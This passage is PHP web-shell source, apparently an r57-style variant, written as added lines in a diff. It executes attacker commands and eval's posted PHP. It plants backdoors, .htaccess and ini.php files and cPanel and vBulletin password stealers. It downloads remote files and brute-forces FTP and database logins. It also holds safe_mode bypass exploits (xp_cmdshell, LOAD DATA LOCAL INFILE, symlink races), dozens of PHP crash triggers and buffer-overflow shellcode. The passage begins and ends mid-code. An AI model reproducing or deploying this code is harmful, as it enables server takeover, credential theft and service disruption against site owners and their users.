&"); + $_POST['cmd']="echo \"Now script install backdoor connect to port "; + }else{ +cf("/tmp/bds",$port_bind_bd_cs); + $blah = ex("chmod 777 bds"); + } +if (!empty($_POST['php_ini1'])) +{ + cf("php.ini",$egy_ini); + $_POST['cmd']=" now make incloude for file ini.php and add ss and your shell"; + } + + if (!empty($_POST['htacces'])) +{ + cf(".htaccess",$htacces); + $_POST['cmd']="now .htaccess has been add"; + } + if (!empty($_POST['egy_res'])) +{ + cf(".ini.php",$egy_res); + $_POST['cmd']="now .htaccess has been add"; + } + if (!empty($_POST['egy_ini'])) +{ + cf("ini.php",$egy_ini); + + + $_POST['cmd']=" http://target.com/ini.php?egy=http://shell.txt? add ss ini.php now make incloude for file ini.php and add egy and your shell"; + } + + if (!empty($_POST['egy_cp'])) +{ + cf("pass_cpanel.php",$egy_cp); + $_POST['cmd']="cpanel add"; + } + + if (!empty($_POST['egy_vb'])) +{ + cf("vb_hacker.php",$egy_vb); + $_POST['cmd']="Added Following Files .htaccess & ini.php & vb_hacker.php & pass_cpanel.php "; + } + +if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } + +for($upl=0;$upl<=16;$upl++) +{ + +} + +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case 'fopen': + $datafile = @implode("", @file($_POST['rem_file'])); + if($datafile) + { + if(!morewrite($_POST['loc_file'],$datafile)){ err(0);}; + } + + $_POST['cmd'] = ''; + break; + case 'wget': + $_POST['cmd'] = which('wget')." \"".$_POST['rem_file']."\" -O \"".$_POST['loc_file']."\""; + break; + case 'fetch': + $_POST['cmd'] = which('fetch')." -p \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\""; + break; + case 'lynx': + $_POST['cmd'] = which('lynx')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\""; + break; + case 'links': + $_POST['cmd'] = which('links')." 
-source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\""; + break; + case 'GET': + $_POST['cmd'] = which('GET')." \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\""; + break; + case 'curl': + $_POST['cmd'] = which('curl')." \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\""; + break; + } +} +if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_file_up") || ($_POST['cmd']=="ftp_file_down"))) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { err(3); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);} + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);} + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } + +if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_brute") || ($_POST['cmd']=="db_brute"))) + { + if($_POST['cmd']=="ftp_brute"){ + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + }else if($_POST['cmd']=="db_brute"){ + $connection = 1; + } + if(!$connection) { err(3); $_POST['cmd'] = ""; } + else if(($_POST['brute_method']=='passwd') && (!$users=get_users('/etc/passwd'))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + else if(($_POST['brute_method']=='dic') && (!$users=get_users($_POST['dictionary']))){ echo "<table width=100% cellpadding=0 
cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);} + } + +echo $table_up3; +if (empty($_POST['cmd']) && !$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd']) && $safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +{ + switch($_POST['cmd']) + { + case 'safe_dir': + + if (@function_exists('scandir') && ($d=@scandir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath'])) + { + foreach ($d as $file) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if(!$unix){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + }else{$owner['name']=$grgid['name']='';} + echo $inode." "; + echo perms(@fileperms($file)); + @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo @date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + } + + elseif (@function_exists('dir') && ($d=@dir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath'])) + { + while (false!==($file=$d->read())) + { + if ($file=="." 
|| $file=="..") continue; + @clearstatcache(); + @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if(!$unix){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + }else{$owner['name']=$grgid['name']='';} + echo $inode." "; + echo perms(@fileperms($file)); + @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo @date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + + elseif (@function_exists('opendir') && @function_exists('readdir') && ($d=@opendir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath'])) + { + while (false!==($file=@readdir($d))) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if(!$unix){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + }else{$owner['name']=$grgid['name']='';} + echo $inode." 
"; + echo perms(@fileperms($file)); + @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo @date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + @closedir($d); + } + + elseif(@function_exists('glob') && (isset($_POST['glob']) || !isset($_POST['realpath']))) + { + echo "PHP glob() listing directory Safe_mode bypass Exploit\r\n\r\n"; + function eh($errno, $errstr, $errfile, $errline) + { + global $D, $c, $i; + preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); + if($o){ $D[$c] = $o[2]; $c++;} + } + $error_reporting = @ini_get('error_reporting'); + error_reporting(E_WARNING); + @ini_set("display_errors", 1); + @ini_alter("display_errors", 1); + $root = "/"; + if($dir) $root = $dir; + $c = 0; $D = array(); + @set_error_handler("eh"); + $chars = "_-.0123456789abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; + for($i=0; $i < strlen($chars); $i++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}"; + $prevD = $D[count($D)-1]; + @glob($path."*"); + if($D[count($D)-1] != $prevD) + { + for($j=0; $j < strlen($chars); $j++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}"; + $prevD2 = $D[count($D)-1]; + @glob($path."*"); + if($D[count($D)-1] != $prevD2) + { + for($p=0; $p < strlen($chars); $p++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}"; + $prevD3 = $D[count($D)-1]; + @glob($path."*"); + if($D[count($D)-1] != $prevD3) + { + for($r=0; $r < strlen($chars); $r++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}"; + @glob($path."*"); + } + } + } + } + } + } + } + $D = array_unique($D); + foreach($D as $item) echo "{$item}\r\n"; + echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." 
sec\r\n"; + error_reporting($error_reporting); + } + elseif(@function_exists('realpath') && (!isset($_POST['glob']) || isset($_POST['realpath']))) + { + echo "PHP realpath() listing directory Safe_mode bypass Exploit\r\n\r\n"; + if(!$dir){$dir='/etc/';}; + if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';} + if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';} + + if($realpath=realpath($dir.'/')){echo $realpath."\r\n";} + if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."\r\n";} + foreach($presets_rlph as $preset_rlph){ + if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."\r\n";} + } + for($i=0; $i < strlen($chars_rlph); $i++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=1){continue;}; + for($j=0; $j < strlen($chars_rlph); $j++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=2){continue;}; + for($x=0; $x < strlen($chars_rlph); $x++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=3){continue;}; + for($y=0; $y < strlen($chars_rlph); $y++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=4){continue;}; + for($z=0; $z < strlen($chars_rlph); $z++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=5){continue;}; + for($w=0; $w < strlen($chars_rlph); $w++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."\r\n";} + } + } + } + } + } + } + echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." 
sec\r\n"; + } + else echo $lang[$language.'_text29']; + break; + + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file']); + $cf = @curl_exec($ci); + echo htmlspecialchars($cf); + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + @mysql_query("DROP TABLE IF EXISTS temp_r57_table"); + @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )"); +/* @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");*/ + @mysql_query("LOAD DATA LOCAL INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table"); + $r = @mysql_query("SELECT * FROM temp_r57_table"); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; } + @mysql_query("DROP TABLE IF EXISTS temp_r57_table"); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo htmlspecialchars($row[0])."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! 
Can't connect to MSSQL server"; + break; + case 'test5': + $temp=tempnam($dir, "fname"); + if (@file_exists($temp)) @unlink($temp); + $extra = "-C ".$_POST['test5_file']." -X $temp"; + @mb_send_mail(NULL, NULL, NULL, NULL, $extra); + $str = moreread($temp); + echo htmlspecialchars($str); + @unlink($temp); + break; + case 'test6': + $stream = @imap_open('/etc/passwd', "", ""); + $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*"); + for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n"; + @imap_close($stream); + break; + case 'test7': + $stream = @imap_open($_POST['test7_file'], "", ""); + $str = @imap_body($stream, 1); + echo htmlspecialchars($str); + @imap_close($stream); + break; + case 'test8': + $temp=@tempnam($_POST['test8_file2'], "copytemp"); + $str = readzlib($_POST['test8_file1'],$temp); + echo htmlspecialchars($str); + @unlink($temp); + break; + + case 'test9': + @ini_restore("safe_mode"); + @ini_restore("open_basedir"); + $str = moreread($_POST['test9_file']); + echo htmlspecialchars($str); + break; + case 'test10': + @ob_clean(); + $error_reporting = @ini_get('error_reporting'); + error_reporting(E_ALL ^ E_NOTICE); + @ini_set("display_errors", 1); + @ini_alter("display_errors", 1); + $str=@fopen($_POST['test10_file'],"r"); + while(!feof($str)){print htmlspecialchars(fgets($str));} + fclose($str); + error_reporting($error_reporting); + break; + case 'test11': + @ob_clean(); + $temp = 'zip://'.$_POST['test11_file']; + $str = moreread($temp); + echo htmlspecialchars($str); + break; + case 'test12': + @ob_clean(); + $temp = 'compress.bzip2://'.$_POST['test12_file']; + $str = moreread($temp); + echo htmlspecialchars($str); + break; + case 'test13': + @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']); + echo $lang[$language.'_text61']; + break; + case 'test14': + @session_save_path($_POST['test14_file2']."\0;$tempdir"); + @session_start(); + 
@$_SESSION[php]=$_POST['test14_file1']; + echo $lang[$language.'_text61']; + break; + case 'test15': + @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']); + echo $lang[$language.'_text61']; + + break; + case 'test_5_2_6': +echo getcwd()."\n"; +chdir($_POST['test_5_2_6']); +echo getcwd()."\n"; + break; + + + case 'test2_5_2_6': +var_dump(posix_access($_POST['test15_file1'])); + + break; + + case 'test_5_2_4': +//PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass + +//author: shinnai +//mail: shinnai[at]autistici[dot]org +//site: http://shinnai.altervista.org + +//Tested on xp Pro sp2 full patched, worked both from the cli and on apache + +//Technical details: +//ionCube version: 6.5 +//extension: ioncube_loader_win_5.2.dll (other may also be vulnerable) +//url: www.egyspider.eu + +//php.ini settings: +//safe_mode = On +//disable_functions = ioncube_read_file, readfile + +//Description: +//This is useful to obtain juicy informations but also to retrieve source +//code of php pages, password files, etc... you just need to change file path. +//Anyway, don't worry, nobody will read your obfuscated code :) + +//greetz to: BlackLight for help me to understand better PHP + +//P.S. +//This extension contains even an interesting ioncube_write_file function... + +if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required! 
You are now can establish any order"); + +$path = str_repeat("..\\", 20); + +$MyBoot_readfile = readfile($path."windows\\system.ini"); #just to be sure that I set correctely disable_function :) + +$MyBoot_ioncube = ioncube_read_file($path."boot.ini"); + +echo $MyBoot_readfile; + +echo "<br><br>ionCube output:<br><br>"; + +echo $MyBoot_ioncube; + break; + + + + case 'egy_perl': +if(!extension_loaded('perl'))die('perl extension is not loaded'); +if(!isset($_GET))$_GET=&$HTTP_GET_VARS; +if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls'; +$perl=new perl(); +echo "<textarea rows='25' cols='75'>"; +$perl->eval("system('".$_GET['cmd']."')"); +echo "</textarea>"; +$_GET['cmd']=htmlspecialchars($_GET['cmd']); + break; + + break; + case 'egy_4_2_0': + for ($i = 0; $i < 60000; $i++) + { + if (($tab = @posix_getpwuid($i)) != NULL) + { + echo $tab['name'].":"; + echo $tab['passwd'].":"; + echo $tab['uid'].":"; + echo $tab['gid'].":"; + echo $tab['gecos'].":"; + echo $tab['dir'].":"; + echo $tab['shell']."<br>"; + } + } + break; + + + case 'egy_5_2_3': +//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass + +//author: egy spider +//mail: egy_spider@hotmail.com +//site: http://egyspider.eu + +//Tested on xp Pro sp2 full patched, worked both from the cli and on apache + +//Thanks to rgod for all his precious advises :) + +//I set php.ini in this way: +//safe_mode = On +//disable_functions = system +//if you launch the exploit from the cli, cmd.exe will be wxecuted +//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager + +if (!extension_loaded("win32std")) die("win32std extension required!"); +system("cmd.exe"); //just to be sure that protections work well +win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe"); + break; + + break; + + + case 'test16': + if (@fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61']; 
+ break; + case 'test17_1': + @unlink('symlinkread'); + @symlink('a/a/a/a/a/a/', 'dummy'); + @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread'); + @unlink('dummy'); + while (1) + { + @symlink('.', 'dummy'); + @unlink('dummy'); + } + break; + case 'test17_2': + $str=''; + while (strlen($str) < 3) { +/* $str = moreread('symlinkread');*/ + $str = @file_get_contents('symlinkread'); + if($str){ @ob_clean(); echo htmlspecialchars($str);} + } + break; + case 'test17_3': + $dir = $files = array(); + if(@version_compare(@phpversion(),"5.0.0")>=0){ + while (@count($dir) < 3) { + $dir=@scandir('symlinkread'); + if (@count($dir) > 2) {@ob_clean(); @print_r($dir); } + } + } + else { + while (@count($files) < 3) { + $dh = @opendir('symlinkread'); + while (false !== ($filename = @readdir($dh))) { + $files[] = $filename; + } + if(@count($files) > 2){@ob_clean(); @print_r($files); } + } + } + break; + case 'test18': + @putenv("TMPDIR=".$_POST['test18_file2']); + @ini_set("session.save_path", ""); + @ini_alter("session.save_path", ""); + @session_start(); + @$_SESSION[php]=$_POST['test18_file1']; + echo $lang[$language.'_text61']; + break; + case 'test19': + if(empty($_POST['test19_port'])) { $_POST['test19_port'] = "3306"; } + $m = new mysqli('localhost',$_POST['test19_ml'],$_POST['test19_mp'],$_POST['test19_md'],$_POST['test19_port']); + if(@mysqli_connect_errno()){ echo "[-] ERROR! 
Can't connect to mysqli server: ".mysqli_connect_error() ;}; + $m->options(MYSQLI_OPT_LOCAL_INFILE, 1); + $m->set_local_infile_handler("r"); + $m->query("DROP TABLE IF EXISTS temp_r57_table"); + $m->query("CREATE TABLE temp_r57_table ( 'file' LONGBLOB NOT NULL )"); + $m->query("LOAD DATA LOCAL INFILE \"".$_POST['test19_file']."\" INTO TABLE temp_r57_table"); + $r = $m->query("SELECT * FROM temp_r57_table"); + while(($r_sql = @mysqli_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; } + $m->query("DROP TABLE IF EXISTS temp_r57_table"); + $m->close(); + break; + } +} + +if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){ + $cmd_rep = ex($_POST['cmd']); + if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; } +}/*elseif($safe_mode){ + $cmd_rep = safe_ex($_POST['cmd']); + if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; } +} +*/ + +switch($_POST['cmd']) +{ + case 'dos1': + function a() { a(); } a(); + break; + case 'dos2': + @pack("d4294967297", 2); + break; + case 'dos3': + $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a))); + break; + case 'dos4': + $t = array(1);while (1) {$a[] = &$t;}; + break; + case 'dos5': + @dl("sqlite.so");$db = new SqliteDatabase("foo"); + break; + case 'dos6': + preg_match('/(.(?!b))*/', @str_repeat("a", 10000)); + break; + case 'dos7': + @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538)); + break; + case 'dos8': + @shell_exec("killall -11 httpd"); + break; + case 'dos9': + function cx(){ @tempnam("/www/", '../../../../../..'.$tempdir.'cx'); cx(); } cx(); + break; + case 'dos10': + $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0); + break; + case 'dos11': + 
@array_fill(1,123456789,"Infigo-IS"); + break; + case 'dos12': + @substr_compare("A","A",12345678); + break; + case 'dos13': + @unserialize("a:2147483649:{"); + break; + case 'dos14': + $Data = @str_ireplace("\n", "<br>", $Data); + break; + case 'dos15': + function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);} + $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);} + @htmlentities($str1, ENT_NOQUOTES, "UTF-8"); + break; + case 'dos16': + $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e); + for ($i=0; $i<1000; $i++) $arr[$i]=array(array("")); + unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]); + break; + case 'dos17': + $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU"; + $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"; + $x = "AQ "; + unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x); + break; + case 'dos18': + $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600); + if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err)) + echo "Msg not sent because $msg_err\n"; + if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) { + echo "$msg\n"; + } else { echo "Received $msg_error fetching message\n"; break; } + @msg_remove_queue ($msg_id); + break; + case 'dos19': + $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r"); + break; + case 'dos20': + $hashtable = str_repeat("A", 39); + $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08); + $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99); + $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}'; + for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; } + $str .= 
's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;'; + @unserialize($str); + break; + case 'dos21': + imagecreatetruecolor(1234,1073741824); + break; + case 'dos22': + imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),imagecreatetruecolor(120, 120), 0, 0, 0, 0, 0x7fffffff, 120, 120, 120); + break; + case 'dos23': + $a = str_repeat ("A",9989776); $b = str_repeat("/", 2798349); iconv_substr($a,0,1,$b); + break; + case 'dos24': + setlocale(LC_COLLATE, str_repeat("A", 34438013)); + break; + case 'dos25': + glob(str_repeat("A", 9638013)); + break; + case 'dos26': + glob("a",-1); + break; + case 'dos27': + fnmatch("*[1]e", str_repeat("A", 9638013)); + break; + case 'dos28': + if (extension_loaded("gd")){ $buff = str_repeat("A",9999); $res = imagepsloadfont($buff); echo "boom!!\n";} + break; + case 'dos29': + if(function_exists('msql_connect')){ msql_pconnect(str_repeat('A',49424).'BBBB'); msql_connect(str_repeat('A',49424).'BBBB');} + break; + case 'dos30': + $a=str_repeat("A", 65535); $b=1; $c=str_repeat("A", 65535); chunk_split($a,$b,$c); + break; + case 'dos31': + if (extension_loaded("win32std") ) { win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );} + break; + case 'dos32': + if (extension_loaded( "iisfunc" ) ){ $buf_unicode = str_repeat( "A", 256 ); $eip_unicode = "\x41\x41"; iis_getservicestate( $buf_unicode . 
$eip_unicode );} + break; + case 'dos33': + $buff = str_repeat("\x41", 250);$get_EIP = "\x42\x42";$get_ESP = str_repeat("\x43", 100);$get_EBP = str_repeat("\x44", 100);ntuser_getuserlist($buff.$get_EIP.$get_ESP.$get_EBP); + break; + case 'dos34': + if (extension_loaded("bz2")){ $buff = str_repeat("a",1000); com_print_typeinfo($buff);} + break; + case 'dos35': + $a = str_repeat("/", 4199000); iconv(1, $a, 1); + break; + case 'dos36': + $a = str_repeat("/", 2991370); iconv_mime_decode_headers(0, 1, $a); + break; + case 'dos37': + $a = str_repeat("/", 3799000); iconv_mime_decode(1, 0, $a); + break; + case 'dos39': + sprintf("[%'A2147483646s]\n", "A"); + break; + break; + case 'dos40': +// PHP <= 4.4.6 mssql_connect() & mssql_pconnect() local buffer overflow +// poc exploit (and safe_mode bypass) +// windows 2000 sp3 en / seh overwrite +// by rgod +// site: http://egyspider.eu + +// u can easily adjust for php5 +// this as my little contribute to MOPB + +$____scode= +"\xeb\x1b". +"\x5b". +"\x31\xc0". +"\x50". +"\x31\xc0". +"\x88\x43\x59". +"\x53". +"\xbb\xca\x73\xe9\x77". //WinExec +"\xff\xd3". +"\x31\xc0". +"\x50". +"\xbb\x5c\xcf\xe9\x77". //ExitProcess +"\xff\xd3". +"\xe8\xe0\xff\xff\xff". +"\x63\x6d\x64". +"\x2e". +"\x65". +"\x78\x65". +"\x20\x2f". +"\x63\x20". 
+"start notepad & "; + + $eip="\xdc\xf5\x12"; + $____suntzu=str_repeat("\x90",100); + $____suntzu.=$____scode; + $____suntzu.=str_repeat("a",2460 - strlen($____scode)); + $____suntzu.=$eip; + break; + case 'zend': + if(empty($_POST['zend'])){ +} else { + +$dezend=$_POST['zend']; +include($_POST['zend']); +print_r($GLOBALS); +require_once("$dezend"); +echo "</textarea></p>"; +} +break; + case 'dos38': + $a = str_repeat("/", 9791999); iconv_strlen(1, $a); + break; +} +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} + +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + if($_POST['brute_method']=='passwd'){ + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." 
- success\r\n"; $suc++; } } + @ftp_close($connection); + } + }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){ + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; } + @ftp_close($connection); + } + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } + +if ($_POST['cmd']=="db_brute") + { + $suc = 0; + if($_POST['brute_method']=='passwd'){ + foreach($users as $user) + { + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $user; + $sql->pass = $user; + if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; } + } + if(isset($_POST['reverse'])) + { + foreach($users as $user) + { + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $user; + $sql->pass = strrev($user); + 